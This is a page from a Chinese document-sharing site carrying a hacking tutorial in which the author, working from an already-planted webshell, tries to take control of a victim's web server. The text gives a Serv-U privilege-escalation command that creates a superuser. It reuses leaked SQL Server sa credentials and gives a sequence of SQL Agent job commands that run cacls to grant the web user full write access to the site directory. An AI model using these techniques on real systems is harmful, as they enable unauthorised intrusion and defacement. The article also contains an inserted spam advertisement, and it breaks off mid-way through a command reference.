写权限的突破.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
写权限的突破.doc

写权限的突破 文/ KYO 不知道大家遇到过这种情况没有,就是你得到了一个网站的WEBSHELL,但是在编辑他网站目录里面的文件的时候却发现不能写,这个时候要多郁闷有多郁闷。下面我用一个例子来说明怎么去突破这个写权限。 至于怎么得到WEBSHELL我就不细说了,方法有很多种,上传漏洞,暴库,破解MD5再进后台上传或者利用备份数据库功能改后缀名等等。反正我是得到了一个WEBSHELL,如图1 HOHO~~发现主机中大部分文件都可以浏览,迫不及待的测试编辑文件,虽然WEBSHELL中显示编辑成功,但是再打开那个文件时却没有任何改动过的效果。说明写权限删除了。又在里面乱翻了一通找到了serv-u,用那个砍客联盟客户端木马查看也有SERV-U这个进程,自然的想到用su.exe来提升权限,命令如下F:\物理路径\suu.exe -i targrt ip -u kyo -p kyo327 -a f:能执行的话会在F盘创建一个用户名为kyo 密码为kyo327的超级用户,这样小小的写权限就到手了。而事实总喜欢捉弄我,这个IUSR_SCSYGJSERVER没有执行权限。 抽了两根烟郁闷了一会儿,才想起来在弄他WEBSHELL的时候探测到他里面有数据库用的是SQL SERVER,想都没想直接去找他数据库连接文件,找到这句代码 connStr=Provider=SQLOLEDB.1; Persist Security Info=True; Data Source=.; Initial Catalog=scyg; User ID=sa; Password=format c: 我晕,数据库连接对象竟然是SA,这不找死吗,密码也有个性format c: 打开查询分析器发现执行命令也是失败的,并且他的xp_cmdshell没有删除,这是我感到最诧异的。这个时候我彻底的没有了办法。 *************************************************************** 这里插播个广告,黑友们请无视,只是为朋友的网站能被搜索引擎收录,多加点流量。 返利网,淘你喜欢,淘宝返利,淘宝返现购物。 *************************************************************** 又郁闷了两天,我发现数据库用户里不但有我加的用户kyo,还有xiaolu,如下图 我才知道xiaolu 肯定也来玩过,好容易等到他上线,请教他了一下,才知道还是有希望执行命令的。打开查询分析器,用SA连接他的SQL SERVER,依次执行以下命令 use msdb; exec sp_add_job @job_name=kyo520; exec sp_add_jobstep @job_name=kyo520,@step_name = Exec my sql,@subsystem=CMDEXEC,@command=cacls.exe d:\newweblilemon /E /G IUSR_SCSYGJSERVER:F; (CACLS命令是改权限的,d:\newweblilemon 这个目录就是我需要改权限的那个目录) exec sp_add_jobserver @job_name = kyo520,@server_name = SCSYGJSERVER; (肉鸡的计算机名) exec sp_start_job @job_name=kyo520; 也许有一部分人对cacls命令不是很清楚,我顺便给出一部分说明。 C:\cacls 显示或者修改文件的访问控制表(ACL) CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]] [/P user:perm [...]] [/D user [...]] filename 显示 ACL。 /T 更改当前目录及其所有子目录中 指定文件的 ACL。 /E 编辑 ACL 而不替换。 /C 在出现拒绝访问错误时继续。 /G user:perm 赋予指定用户访问权限。 Perm 可以是: R 读取 W 写入

文档评论(0)

docinpfd + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

版权声明书
用户编号:5212202040000002

1亿VIP精品文档

相关文档